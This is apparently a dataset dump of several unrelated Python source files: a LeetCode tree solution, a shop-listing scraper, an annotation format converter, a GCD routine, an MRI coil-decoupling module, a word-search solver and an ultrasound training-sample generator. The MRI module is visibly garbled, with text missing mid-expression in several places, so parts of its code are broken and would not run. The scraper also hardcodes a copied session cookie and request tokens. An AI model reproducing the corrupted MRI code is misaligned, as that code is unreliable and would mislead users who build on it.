+{"seq_id":"101880599","text":"# Leetcode 199. Binary Tree Right Side View\n\n# Time Complexity : O(n) where n is the number of the nodes\n\n# Space Complexity :\n# BFS:: O(n/2) == O(n) where n is the number of the nodes that can be in the q at worst\n# DFS :: O(h) where h is the height of the tree\n\n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : No\n\n# Approach: DFS :: at every node if the current level matches the size of the result array, add the node\n# to result. Increment the level by 1 and call dfs recursively on left and right node.\n# BFS:: add the root to que, at every level append the last node to the result. If the left or \n# right child are present add them to the q. return result after q is empty \n\n# Your code here along with comments explaining your approach\n\n# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, val=0, left=None, right=None):\n#         self.val = val\n#         self.left = left\n#         self.right = right\n\n# DFS approach :: Traversing the tree recursively starting with the right sub tree first at every level\nclass Solution:\n    result = None\n    def rightSideView(self, root: TreeNode) -> List[int]:\n        self.result = []\n        if not root:\n            return self.result\n        self.dfs(root,0)\n        return self.result\n    \n    def dfs(self,node,level):\n        if not node:\n            return\n        # Updating rightSide view when the current level matches the size of the view array\n        if level == len(self.result):\n            self.result.append(node.val)\n        # Traversing next level starting with right subtree \n        self.dfs(node.right,level+1)\n        self.dfs(node.left,level+1)\n\n\n# BFS approach\nfrom collections import deque\nclass Solution:\n    result = None\n    def rightSideView(self, root: TreeNode) -> List[int]:\n        q = deque()\n        q.append(root)\n        result = []\n        while q:\n            size = len(q)\n            # At every level append the last node to the result\n            for i in range(len(q)):\n                node = q.popleft()\n                if i == size-1:\n                    result.append(node.val)\n                # If the left or right child are present add them to the q\n                if node.left:\n                    q.append(node.left)\n                if node.right:\n                    q.append(node.right)\n            # return result after q is empty \n        return result","sub_path":"BT_RightSide_View.py","file_name":"BT_RightSide_View.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"623725950","text":"import time\nfrom multiprocessing.pool import Pool\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nimport parsing_methods.shop as s\nimport parsing_methods.valueForParsing as v\nfrom parsing_methods.parsingAbstractClass import Parsing\n\n\nclass RequestsLetyShopsParsing(Parsing):\n    def get_name_class(self):\n        return type(self).__name__\n\n    __address = 'https://letyshops.com/shops?page='\n\n    def __init__(self):\n        pass\n\n    def parsing(self):\n        \"\"\"Returns the list of parsed items\"\"\"\n        pool = 
Pool(processes=4)\n        max_page = self.__get_max_page()\n        all_items = pool.map(self.get_response, range(1, max_page + 1))\n        result = pool.map(self.parse_elements, all_items)\n        shops = []\n        for items in result:\n            for shop in items:\n                shops.append(shop)\n        return shops\n\n    def get_response(self, i):\n        url = \"https://letyshops.com/shops\"\n        querystring = {\"page\": str(i)}\n        payload = \"\"\n        headers = {\n            'User-Agent': \"PostmanRuntime/7.11.0\",\n            'Accept': \"*/*\",\n            'Cache-Control': \"no-cache\",\n            'Postman-Token': \"03d403a9-0fb6-4893-826c-6f67e5b323e1,5b89c07f-246f-4436-aadd-fa711d08cf04\",\n            'Host': \"letyshops.com\",\n            'cookie': \"hl=ru_RU; country=RU%3A0; lsvtkn=d7ca64e7165cfd3175dddfa1cc11bf15\",\n            'accept-encoding': \"gzip, deflate\",\n            'Connection': \"keep-alive\",\n            'cache-control': \"no-cache\"\n        }\n\n        response = requests.request(\"GET\", url, data=payload, headers=headers, params=querystring)\n        result = response.content\n        return response.content\n\n    def parse_elements(self, html):\n        result = []\n        soup = BeautifulSoup(html, 'lxml')\n        shops = soup.find_all('div', class_='b-teaser')\n        for shop in shops:\n            name = self.__get_name(shop)\n            discount = self.__get_discount(shop)\n            label = self.__get_label(shop)\n            url = self.__get_url(shop)\n            image = self.__get_image(shop)\n            item = s.Shop(name, discount, label, url, image)\n            result.append(item)\n        return result\n\n    def __get_image(self, shop):\n        image = shop.find('div', class_='b-teaser__cover').find('img').get('src')\n        return image\n\n    def __get_url(self, shop):\n        url = shop.find('a', class_='b-teaser__inner').get('href')\n        return v.clear_url_letyShops + url\n\n    def __get_label(self, shop):\n        label = shop.find_all('span', class_='b-shop-teaser__label')[-1]\n        if label is None:\n            label = shop.find('span', class_='b-shop-teaser__label--red')\n        else:\n            label = label.text.strip()\n        return label\n\n    def __get_discount(self, shop):\n        discount = shop.find('span', class_='b-shop-teaser__cash')\n        if discount is None:\n            discount = shop.find('span', class_='b-shop-teaser__new-cash').text.strip()\n        else:\n            discount = discount.text.strip()\n        return discount\n\n    def __get_name(self, shop):\n        name = shop.find('div', class_='b-teaser__title').text.strip()\n        return name\n\n    def print_array(self, array: []):\n        if len(array) > 0:\n            for item in array:\n                print(item.__str__())\n        else:\n            print(\"Empty list\")\n\n    def __get_max_page(self):\n        soup = BeautifulSoup(self.__get_Html(v.letyShops), 'lxml')\n        new_pages = []\n        pages = soup.find_all('a', class_='b-pagination__link')\n        for page in pages:\n            new_page = int(page.get('data-page'))\n            new_pages.append(new_page)\n        return max(new_pages)\n\n    def __get_Html(self, url):\n        try:\n            r = requests.get(url)\n            return r.text\n        except ConnectionError as e:\n            print(\"Error\")\n\n\nif __name__ == '__main__':\n    parser = RequestsLetyShopsParsing()\n    start = time.time()\n    parser.parsing()\n    print(time.time() - start)\n","sub_path":"parsing_methods/request_letyshops_parsing.py","file_name":"request_letyshops_parsing.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"106460256","text":"import re\nimport json\nimport os\nimport easygui\nimport time\n\ndef get_str_time():\n    return time.strftime('%Y%m%d%H%M%S')\n\ndef get_files_in_dir(basepath,ext=[],debug=False):\n\n    basepath=os.path.abspath(basepath)\n\n    ext = [str.lower(x) for x in ext]\n\n    try:\n        if os.path.exists(basepath) and os.path.isdir(basepath):\n            result=[os.path.join(basepath,x) 
for x in os.listdir(basepath)]\n            files=[[os.path.split(x)[0],*os.path.splitext(os.path.basename(x))] for x in result if os.path.isfile(x)]\n            if len(ext)==0:\n                # print('No extension filter; returning all files')\n                if debug:print(files)\n                return files\n\n            if len(ext)>0 :\n                # print('Returning files with extensions {}'.format(ext))\n                files=[[os.path.split(x)[0],*os.path.splitext(os.path.basename(x))] for x in result if str.lower(re.split(r'\\.',x)[-1]) in ext]\n                if debug:print(files)\n                return files\n        else:\n            return False\n    except Exception as e:\n        print('An error occurred: {}'.format(e))\n\ndef write_txt(filepath,txt):\n    with open(filepath,'w',encoding='utf-8') as f:\n        f.write(txt)\n\ndef clean_char_in_filename(s):\n    return re.sub('[?、_()\\\\\\/*、<>|]', '-', s)\n\ndef parse(xml_path,output_file_path):\n    print(xml_path)\n\n    with open(xml_path, 'r', encoding='utf-8') as f:\n        data = json.load(f)\n\n    filename=data['imagePath']\n    height=data['imageHeight']\n    width=data['imageWidth']\n\n    with open(output_file_path,'w',encoding='utf-8') as f:\n        print(output_file_path)\n        f.write('<?xml version=\"1.0\" ?>\\n')\n        f.write('<annotation>\\n')\n        f.write('\\t<folder>{}</folder>\\n'.format(os.path.dirname(xml_path)))\n        f.write('\\t<filename>{}</filename>\\n'.format(filename))\n        f.write('\\t<path>{}</path>\\n'.format(xml_path))\n\n        f.write('\\t<source>\\n')\n        f.write('\\t\\t<database>Unknown</database>\\n')\n        f.write('\\t</source>\\n')\n\n        f.write('\\t<size>\\n')\n        f.write('\\t\\t<width>{}</width>\\n'.format(width))\n        f.write('\\t\\t<height>{}</height>\\n'.format(height))\n        f.write('\\t\\t<depth>{}</depth>\\n'.format(3))\n        f.write('\\t</size>\\n')\n\n        f.write('\\t<segmented>0</segmented>\\n')\n\n        for shape in data['shapes']:\n            print(shape)\n            xmin,ymin=shape['points'][0]\n            xmax,ymax=shape['points'][1]\n            name=shape['label']\n            pose='Unspecified'\n            truncated=difficult=0\n\n            f.write('\\t<object>\\n')\n            f.write('\\t\\t<name>{}</name>\\n'.format(name))\n            f.write('\\t\\t<pose>{}</pose>\\n'.format(pose))\n            f.write('\\t\\t<truncated>{}</truncated>\\n'.format(truncated))\n            f.write('\\t\\t<difficult>{}</difficult>\\n'.format(difficult))\n            f.write('\\t\\t<bndbox>\\n')\n            f.write('\\t\\t\\t<xmin>{}</xmin>\\n\\t\\t\\t<ymin>{}</ymin>\\n\\t\\t\\t<xmax>{}</xmax>\\n\\t\\t\\t<ymax>{}</ymax>\\n'.format(xmin,ymin,xmax,ymax))\n            f.write('\\t\\t</bndbox>\\n')\n            f.write('\\t</object>\\n')\n\n        f.write('</annotation>\\n')\n\ndef check_dir(d):\n    d=os.path.abspath(d)\n    if not os.path.exists(d):\n        os.makedirs(d)\n    return d\n\n\nsourcedir=easygui.diropenbox('Select the directory to process','Select the directory to process')\n\nsourcedir=check_dir(sourcedir)\noutputdir=check_dir('./voc_xml')\n\nfor basepath,filename,extname in get_files_in_dir(sourcedir,['json']):\n    source_file_path=os.path.join(basepath,filename+extname)\n    output_file_path=os.path.join(outputdir,filename+'.xml')\n    parse(source_file_path,output_file_path)\n\n","sub_path":"数据集处理/葛某-json转voc-20230518/labelme标注转voc.py","file_name":"labelme标注转voc.py","file_ext":"py","file_size_in_byte":3608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"618413833","text":"# Python3 implementation of the approach\nfrom math import gcd as __gcd\n\n\n# Function to return the maximum\n# possible gcd after replacing\n# a single element\ndef MaxGCD(a, n):\n    # Prefix and Suffix arrays\n    Prefix = [0] * (n + 2);\n    Suffix = [0] * (n + 2);\n\n    # Single state dynamic programming relation\n    # for storing gcd of first i elements\n    # from the left in Prefix[i]\n    Prefix[1] = a[0];\n\n    for i in range(2, n + 1):\n        Prefix[i] = __gcd(Prefix[i - 1], a[i - 1]);\n\n    # Initializing Suffix array\n    Suffix[n] = a[n - 1];\n\n    # Single state dynamic programming relation\n    # for storing gcd of all the elements having\n    # index greater than or equal to i in Suffix[i]\n    for i in range(n - 1, 0, -1):\n        Suffix[i] = __gcd(Suffix[i + 1], a[i - 1]);\n\n    # If first or last element of\n    # the array has to be replaced\n    ans = max(Suffix[2], Prefix[n - 1]);\n\n    # 
If any other element is replaced\n for i in range(2, n):\n ans = max(ans, __gcd(Prefix[i - 1],\n Suffix[i + 1]));\n\n # Return the maximized gcd\n return ans;\n\n\n# Driver code\nif __name__ == \"__main__\":\n a = [6, 7, 8];\n n = len(a);\n\n print(MaxGCD(a, n));\n\n# This code is contributed by AnkitRai01\n","sub_path":"codeforce/f3.py","file_name":"f3.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"283346452","text":"from sys import path as syspath\nfrom python.mri_python.varian_read_file import *\nfrom scipy.ndimage.morphology import binary_dilation\nfrom scipy.linalg import lstsq,inv\nfrom numpy.fft import *\nfrom numpy.random import permutation\n#from pylab import figure,plot,subplot,show,imshow,colorbar,cm\n\ndef fetch_grappa4prof_data(inputAcq,petable,remove_ppeshift=True,dcplppeadj=None): \n #retrieve and reconstruct 4 2D \"grappa profiles\" from fid file\n nmice = inputAcq.nmice\n nacq = int(get_dict_value(inputAcq.param_dict,'np',1)/2)\n nro = int(get_dict_value(inputAcq.param_dict,'nro',1))\n nv = int(get_dict_value(inputAcq.param_dict,'nv',1))\n nv2 = int(get_dict_value(inputAcq.param_dict,'nv2',1))\n grappafov = int(get_dict_value(inputAcq.param_dict,'grappafov',1))\n nrcvrs = inputAcq.nrcvrs\n if (nmice>nrcvrs):\n nmice=nrcvrs\n t1_array = parse_petable_file(petable,'t1')\n t2_array = parse_petable_file(petable,'t2')\n mm_ppe = array(get_dict_value(inputAcq.param_dict,'mm_ppe',[0,0,0,0])).astype(float)\n lpe = get_dict_value(inputAcq.param_dict,'lpe',2.56)\n if (dcplppeadj==None):\n dcplppeadj = zeros((len(mm_ppe),),float) \n #identify large fov data (even if not centred)\n pegrid = zeros((nv2*grappafov,nv*grappafov),int)\n pegrid[t2_array+(int(nv2/2)-1)*grappafov,t1_array+(int(nv/2)-1)*grappafov] = 1\n fovmask = zeros(pegrid.shape,int)\n fovmask[1:-1,1:-1] = ((pegrid[0:-2,0:-2] + pegrid[1:-1,0:-2] + pegrid[2::,0:-2] + \\\n pegrid[0:-2,1:-1] + pegrid[1:-1,1:-1] + pegrid[2::,1:-1] + \\\n pegrid[0:-2,2::] + pegrid[1:-1,2::] + pegrid[2::,2::] ) > 2)*(pegrid[1:-1,1:-1]>0)\n i2,i1 = nonzero(fovmask)\n inds=array([],int)\n for j in range(len(i2)):\n inds = append(inds,nonzero( ((t2_array+(int(nv2/2)-1)*grappafov)==i2[j])&((t1_array+(int(nv/2)-1)*grappafov)==i1[j]) )[0] )\n grappapix = max(t2_array[inds])-min(t2_array[inds])+2\n grappapix = min(grappapix,max(t1_array[inds])-min(t1_array[inds])+2) \n raw_data = zeros((nmice,4,grappapix,nacq),complex)\n n_grabs = zeros((4,grappapix),int)\n t1cen = (max(t1_array[inds])+min(t1_array[inds]))/2; t1min = min(t1_array[inds])-int(mean(t1_array[inds]))\n t2cen = (max(t2_array[inds])+min(t2_array[inds]))/2; t2min = min(t2_array[inds])-int(mean(t2_array[inds]))\n if (remove_ppeshift):\n if (len(dcplppeadj)0,n_grabs,1)\n raw_data = raw_data/n_grabs[newaxis,:,:,newaxis]\n if (get_dict_value(inputAcq.param_dict,'sgflag','n')=='y'):\n maxind = raw_data.shape[-1]-nro+argmax(abs(raw_data[0,0,grappapix//2,-nro::]))\n endpt = [maxind+int(nro/2),nacq-1][maxind+int(nro/2)>=nacq]\n startpt = endpt-nro\n else:\n startpt = 0\n endpt = nro\n if (nro>nacq):\n print(\"ERROR: nro and np appear to be set inconsistently!!!\")\n endpt = nacq\n profs = fftshift(fft2(fftshift(raw_data[:,:,:,startpt:endpt],axes=(-2,-1)),axes=(-2,-1)),axes=(-2,-1))\n return profs,0.5*(startpt+endpt),delppe\n\n\ndef mask_gappa4prof_data(maskshape,inputAcq):\n #profile directions/order established in fetch_grappa4prof_data\n #should really pass this or detect it\n 
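# (editor note / assumption) each row below appears to weight the ppe2 and ppe\n    # offsets for one of the four GRAPPA profiles (pe2-only, pe-only, and the two\n    # diagonals); the third column is unused in the pixoffset computation below.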
prof_direc=array([[1,0,1],\n [0,1,1],\n [1,1,1],\n [1,-1,1]],int)\n masks = zeros(maskshape,bool)\n #assume fov and mm_pro,mm_ppe and mm_ppe2 specify cylinder, orient specifies direction\n mm_ppe = array(get_dict_value(inputAcq.param_dict,'mm_ppe',[0,5.2,0,-5.4,-5.5,0,5.2,0,0,0,0,0,0,0,0,0])).astype(float)\n mm_ppe2 = array(get_dict_value(inputAcq.param_dict,'mm_ppe2',[0,-3,-6,-3,2.7,6,3,0,0,0,0,0,0,0,0,0,0])).astype(float)\n grappafov = get_dict_value(inputAcq.param_dict,'grappafov',8)\n lpe = get_dict_value(inputAcq.param_dict,'lpe',2.02)\n lpe2 = get_dict_value(inputAcq.param_dict,'lpe2',2.02)\n nmice = inputAcq.nmice\n nrcvrs = inputAcq.nrcvrs\n nmice = [nmice,nrcvrs][nmice>nrcvrs]\n ROIwidth = int( 1.5*maskshape[-2]/int(grappafov) )\n for j in range(nmice):\n for k in range(4): #4 profiles\n #fov and pixshift differences on diagonal axes taken care of by using unnormalized prof_direc in pixoffset calc\n pixoffset = maskshape[-2]*( (mm_ppe2[j]/(grappafov*lpe2))*prof_direc[k,0]+ \n (mm_ppe[j] /(grappafov*lpe ))*prof_direc[k,1] )\n ROIinds = ( (pixoffset+maskshape[-2]/2+arange(ROIwidth)-ROIwidth/2)%maskshape[-2] ).astype(int)\n masks[j,k,ROIinds,:] = 1\n return masks\n\n\ndef find_axis_shift(imgdata1,maskdata1,imgdata2,maskdata2,start=-10,end=10,step=0.5,axis=-1):\n phaseramp=exp(1.j*(arange(imgdata1.shape[axis])-imgdata1.shape[axis]/2)*2*pi/imgdata1.shape[axis])\n steps=arange(start,end,step)\n cmask=(maskdata1!=maskdata2)\n if (not cmask.any()): cmask=ones(maskdata1.shape,bool)\n C = zeros((len(steps),),float)\n for j in range(len(steps)):\n pixshift = steps[j]\n imgdata1adj = fftshift(ifft(fftshift((phaseramp)**(pixshift/2.0)*\n fftshift(fft(fftshift(imgdata1,axes=(axis,)),axis=axis),axes=(axis,)),axes=(axis,)),axis=axis),axes=(axis,))\n imgdata2adj = fftshift(ifft(fftshift((phaseramp)**(-pixshift/2.0)*\n fftshift(fft(fftshift(imgdata2,axes=(axis,)),axis=axis),axes=(axis,)),axes=(axis,)),axis=axis),axes=(axis,))\n v1=abs(imgdata1adj)[cmask]\n v2=abs(imgdata2adj)[cmask]\n mv1=mean(v1)\n mv2=mean(v2)\n C[j] = sum((v1-mv1)*(v2-mv2))/sqrt(sum((v1-mv1)**2)*sum((v2-mv2)**2))\n i1 = argmax(C)\n istart = [0,i1-5][i1-5>0]\n iend = [len(steps),i1+5][i1+5end) or (bestshiftnpts_lstsq):\n rinds = argsort(abs(profs[k])[i3,i2,i1])[-npts_lstsq::]\n i3=i3[rinds]; i2=i2[rinds]; i1=i1[rinds]\n b=append(profs[cgrp[j]].real[i3,i2,i1],profs[cgrp[j]].imag[i3,i2,i1])\n A=zeros([2*len(i1),2],float)\n A[0:len(i1),0] = profs[k].real[i3,i2,i1]\n A[0:len(i1),1] = -profs[k].imag[i3,i2,i1]\n A[len(i1)::,0] = profs[k].imag[i3,i2,i1]\n A[len(i1)::,1] = profs[k].real[i3,i2,i1]\n cres,resid,rank,s = lstsq(A,b)\n Cij[cgrp[j],k] = cres[0]+1.j*cres[1]\n invCij = inv(Cij)\n print(invCij)\n return invCij\n\ndef output_grappa_profs(profs,dcpl_data,dcpl_profs_output_name,masks=None):\n profsmod = profs\n from pylab import figure,imshow,subplot,savefig\n for j in range(profs.shape[0]):\n figure(j+1);\n for k in range(4): #always 4 profiles\n if (masks!=None):\n edges = sqrt( abs(masks[j,k,:,:]-roll(masks[j,k,:,:],-1,axis=-2))**2+\n abs(masks[j,k,:,:]-roll(masks[j,k,:,:],-1,axis=-1))**2 )\n maxsig = max(abs(profsmod[j,k,:,:]).flat)\n imgaspect = float(profs.shape[-1])/float(profs.shape[-2])\n if (imgaspect<0.6): imgaspect=0.6\n subplot(2,2,k+1); imshow(where(edges>0.5,maxsig,abs(profsmod[j,k,:,:])), \n interpolation='nearest',aspect=imgaspect)\n else:\n subplot(2,2,k+1); imshow(abs(profsmod[j,k,:,:]))\n c_outname = dcpl_profs_output_name[:-4]+\"_%d\"%j+dcpl_profs_output_name[-4:]\n savefig(c_outname)\n print(\"Output decoupling 
profile for coil#%d to %s...\"%(j,c_outname))\n return None\n\nclass decouple_info:\n def __init__(self,roposition,invCij,rok0index,nro,ppeshift):\n self.roposition=roposition\n self.invCij=invCij\n self.rok0index=int(rok0index)\n self.nro=int(nro)\n self.ppeshift=ppeshift\n\ndef gen_decoupling_info(inputAcq,petable,cplgrps_string=\"0,2,5;1,3,4,6\",\n dcplppeadj=None,remove_ppeshift=True,dcpl_profs_output_name=None):\n print('Generating coil decoupling coefficients and offsets...')\n profs,rok0index,delppe = fetch_grappa4prof_data(inputAcq,petable,remove_ppeshift=remove_ppeshift,dcplppeadj=dcplppeadj)\n masks = mask_gappa4prof_data(profs.shape,inputAcq)\n cplgrps = [[int(x) for x in grpstrings.split(',')] for grpstrings in cplgrps_string.split(';')]\n if (max([max(x) for x in cplgrps])>=profs.shape[0]):\n print(\"Inconsistency between grappa_coil_groupings and acquired channels...\")\n raise SystemExit\n profs,ropos = dcpl_axis_adjustment(profs,masks,cplgrps,nom_shift=int( inputAcq.param_dict['sw']/2000.0 ),axis=-1) \n invCij = find_coupling_coeffs(profs,masks,cplgrps)\n dcpl_data = decouple_info(ropos,invCij,rok0index,profs.shape[-1],delppe) \n if (dcpl_profs_output_name!=None):\n output_grappa_profs(profs,dcpl_data,dcpl_profs_output_name,masks=masks) \n return dcpl_data\n\n\n","sub_path":"python/mri_python/coil_decouple.py","file_name":"coil_decouple.py","file_ext":"py","file_size_in_byte":12428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"434448375","text":"def exist(board, word):\n k=0\n flag=False\n if(len(word)>len(board[0])*len(board)):\n return False\n if(len(word)==1):\n for i in range(len(board)):\n for j in range(len(board[i])):\n if(board[i][j]==word[k]):\n flag=True\n else:\n for i in range(len(board)):\n for j in range(len(board[i])):\n if(board[i][j]==word[0]):\n # k=k+1\n visited=[]\n visited.append((i,j))\n flag=checkNeighbors(1,word,board, i, j, visited)\n if(flag==True):\n return flag\n return flag\n\ndef checkNeighbors(k, word, board, i , j, visited):\n flag=False\n if(k==len(word)):\n #return True\n flag=True\n return flag\n if((i-1)>=0):\n if(board[i-1][j]==word[k] and (i-1,j) not in visited):\n flag=checkNeighbors(k+1,word,board,i-1,j, visited+[(i-1,j)])\n if(flag==True):\n return flag\n if((i+1)<=len(board)-1):\n if(board[i+1][j]==word[k] and (i+1,j) not in visited):\n flag=checkNeighbors(k+1,word,board,i+1,j, visited+[(i+1,j)])\n if(flag==True):\n return flag\n if((j-1)>=0):\n if(board[i][j-1]==word[k] and (i,j-1) not in visited):\n flag=checkNeighbors(k+1,word,board,i,j-1, visited+[(i,j-1)])\n if(flag==True):\n return flag\n if((j+1)<=len(board[i])-1):\n if(board[i][j+1]==word[k] and (i,j+1) not in visited):\n flag=checkNeighbors(k+1,word,board,i,j+1, visited+[(i,j+1)])\n if(flag==True):\n return flag\n return flag\n\nif __name__ == \"__main__\":\n board =[[\"A\",\"B\",\"C\",\"E\"],[\"S\",\"F\",\"C\",\"S\"],[\"A\",\"D\",\"E\",\"E\"]]\n word = \"ABCB\"\n # word = \"AAB\"\n print(exist(board,word))\n\n","sub_path":"Board.py","file_name":"Board.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"162680511","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 9 18:20:45 2019\r\n\r\n@author: larun\r\n\"\"\"\r\n\r\n####\r\n### IMPORT LIBRARIES\r\n####\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom skimage import exposure\r\nimport os\r\nimport argparse\r\n#import matplotlib.pyplot as 
plt\r\nimport random\r\n\r\n####\r\n### HELPER FUNCTIONS\r\n#### \r\n\r\n# loads all us array paths\r\ndef get_pickle_files(file_dir):\r\n pickle_files = []\r\n for subdir, dirs, files in os.walk(file_dir):\r\n for file in files:\r\n if file.lower()[-7:] == \".pickle\":\r\n pickle_files.append(os.path.join(subdir, file))\r\n return pickle_files \r\n\r\n# load us seq's with specified contrast\r\ndef load_us_seq(pickle_file,opt):\r\n us_seq = pd.read_pickle(pickle_file) \r\n \r\n preproc_us = []\r\n for i in range(len(us_seq['images'])):\r\n img = us_seq['images'].iloc[i]\r\n preproc_us.append(set_contrast(img,opt))\r\n \r\n return preproc_us\r\n\r\n# function to set the image contrast\r\ndef set_contrast(image,opt):\r\n if opt.contrast == 0:\r\n out_img = image\r\n elif opt.contrast == 1:\r\n out_img = exposure.equalize_hist(image)\r\n elif opt.contrast == 2:\r\n out_img = exposure.equalize_adapthist(image)\r\n elif opt.contrast == 3:\r\n out_img = exposure.rescale_intensity(image) \r\n \r\n return out_img\r\n \r\n# create an array of positive triad samples and labels\r\ndef make_pos_samples(us_seq):\r\n pos_triads = []\r\n pos_triad_labels = []\r\n \r\n for k in range(len(us_seq) - 2):\r\n pos_triads.append([us_seq[k], us_seq[k+1], us_seq[k+2]])\r\n pos_triad_labels.append(1)\r\n pos_triads.append([us_seq[k+2], us_seq[k+1], us_seq[k]])\r\n pos_triad_labels.append(1)\r\n \r\n return pos_triads,pos_triad_labels\r\n\r\n# create an array of negative triad samples and labels\r\ndef make_neg_samples(us_seq):\r\n neg_triads = []\r\n neg_triad_labels = []\r\n \r\n for k in range(len(us_seq) - 2):\r\n neg_triads.append([us_seq[k], us_seq[k+2], us_seq[k+1]])\r\n neg_triad_labels.append(0)\r\n neg_triads.append([us_seq[k+1], us_seq[k+2], us_seq[k]])\r\n neg_triad_labels.append(0)\r\n neg_triads.append([us_seq[k+1], us_seq[k], us_seq[k+2]])\r\n neg_triad_labels.append(0)\r\n neg_triads.append([us_seq[k+1], us_seq[k+2], us_seq[k]])\r\n neg_triad_labels.append(0)\r\n \r\n neg_triads = random.sample(neg_triads,k=(2*(len(us_seq)-2)))\r\n neg_triad_labels = random.sample(neg_triad_labels,k=(2*(len(us_seq)-2)))\r\n \r\n return neg_triads,neg_triad_labels\r\n\r\n# get pandas df of an equal number of pos and neg training examples\r\ndef get_training_samples(us_seq):\r\n \r\n pos_triads,pos_labels = make_pos_samples(us_seq)\r\n neg_triads,neg_labels = make_neg_samples(us_seq)\r\n \r\n training_triads = pos_triads + neg_triads\r\n triad_labels = pos_labels + neg_labels \r\n \r\n pre_df = {'triad' : training_triads, 'label' : triad_labels}\r\n training_df = pd.DataFrame(pre_df)\r\n \r\n return training_df\r\n\r\ndef train_test_assg(n_us_seqs,test_prob = 0.2):\r\n return np.random.choice([\"train\",\"test\"],n_us_seqs,p=[1-test_prob,test_prob])\r\n \r\n## get out file name based on in file name for pandas df using pickle \r\ndef get_out_file_name(in_file,group=\"train\"):\r\n if group==\"train\":\r\n out_file_name = in_file.split(\"/\")[-1][:-7] + \"_us_seq_training.pickle\"\r\n elif group==\"test\":\r\n out_file_name = in_file.split(\"/\")[-1][:-7] + \"_us_seq_test.pickle\"\r\n \r\n return out_file_name\r\n\r\n## function by Marta Skreta to image with different contrast settings\r\n# =============================================================================\r\n# def view_sample_images(img):\r\n# plt.figure()\r\n# plt.subplot(2, 2, 1)\r\n# plt.imshow(img, cmap='gray')\r\n# rescaled_cropped_image = exposure.equalize_hist(img)\r\n# plt.subplot(2, 2, 2)\r\n# plt.imshow(rescaled_cropped_image, cmap='gray')\r\n# 
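(editor note: equalize_adapthist below is CLAHE -- local, contrast-limited\r\n# histogram equalization -- unlike the global equalize_hist above.)\r\n# 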
rescaled_cropped_image = exposure.equalize_adapthist(img)\r\n# plt.subplot(2, 2, 3)\r\n# plt.imshow(rescaled_cropped_image, cmap='gray')\r\n# rescaled_cropped_image = exposure.rescale_intensity(img)\r\n# plt.subplot(2, 2, 4)\r\n# plt.imshow(rescaled_cropped_image, cmap='gray')\r\n# plt.show()\r\n# =============================================================================\r\n \r\n# =============================================================================\r\n# def plot_triads(triad):\r\n# plt.figure()\r\n# plt.subplot(1,3,1)\r\n# plt.imshow(triad[0],cmap='gray')\r\n# plt.subplot(1,3,2)\r\n# plt.imshow(triad[1],cmap='gray')\r\n# plt.subplot(1,3,3)\r\n# plt.imshow(triad[2],cmap='gray')\r\n# plt.show()\r\n# =============================================================================\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-in_dir', default='/hpf/largeprojects/agoldenb/lauren/Hydronephrosis/train-us-seqs/', help=\"directory of ultrasound sequences\")\r\n parser.add_argument('-train_dir', default='/hpf/largeprojects/agoldenb/lauren/Hydronephrosis/triad_model/training_samples/', help=\"output directory of training triads\")\r\n parser.add_argument('-test_dir', default='/hpf/largeprojects/agoldenb/lauren/Hydronephrosis/triad_model/test_samples/', help=\"output directory of test triads\")\r\n parser.add_argument('-contrast', default=0, \r\n help=\"Maybe check contrast beforehand! 0 = original image, 1 = exposure.equalize_hist(image), 2 = exposure.equalize_adapthist(image), 3 = exposure.rescale_intensity(image)\")\r\n\r\n opt = parser.parse_args()\r\n \r\n pickle_files = get_pickle_files(opt.in_dir)\r\n \r\n train_test_split = train_test_assg(len(pickle_files))\r\n\r\n i = 0 \r\n for file in pickle_files:\r\n train_vs_test = train_test_split[i] \r\n us_seq = load_us_seq(file,opt)\r\n \r\n try:\r\n training_df = get_training_samples(us_seq) \r\n if train_vs_test == \"train\":\r\n out_file = os.path.join(opt.train_dir,get_out_file_name(file,group = \"train\"))\r\n #os.makedirs(os.path.dirname(out_file), exist_ok=True)\r\n training_df.to_pickle(out_file)\r\n elif train_vs_test == \"test\":\r\n out_file = os.path.join(opt.test_dir,get_out_file_name(file,group = \"test\"))\r\n #os.makedirs(os.path.dirname(out_file), exist_ok=True)\r\n training_df.to_pickle(out_file)\r\n except:\r\n print(\"Error getting training samples for: \" + file)\r\n i=i+1\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n## DEBUG MAIN_FUNCTION\r\n# =============================================================================\r\n# class options(object):\r\n# pass\r\n# \r\n# opt = options()\r\n# opt.in_dir = 'C:/Users/larun/Desktop/Data Science Core/Projects/Urology/Image-analysis/test-dir/'\r\n# opt.contrast = 0\r\n# \r\n# pickle_files = get_pickle_files(opt.in_dir)\r\n# \r\n# file = pickle_files[0]\r\n# #for file in pickle_files:\r\n# us_seq = load_us_seq(file,opt)\r\n# \r\n# get_out_file_name(file)\r\n# \r\n# for k in range(len(us_seq)):\r\n# view_sample_images(us_seq[k])\r\n# \r\n# training_df = get_training_samples(us_seq)\r\n# \r\n# training_df.label[200]\r\n# plot_triads(training_df.triad[200])\r\n# =============================================================================\r\n\r\n# =============================================================================\r\n#class options(object):\r\n# pass\r\n## \r\n#opt = options()\r\n#opt.in_dir = 'C:/Users/larun/Desktop/Data Science Core/Projects/Urology/Image-analysis/test-dir/'\r\n#opt.contrast = 2\r\n#opt.train_dir = 
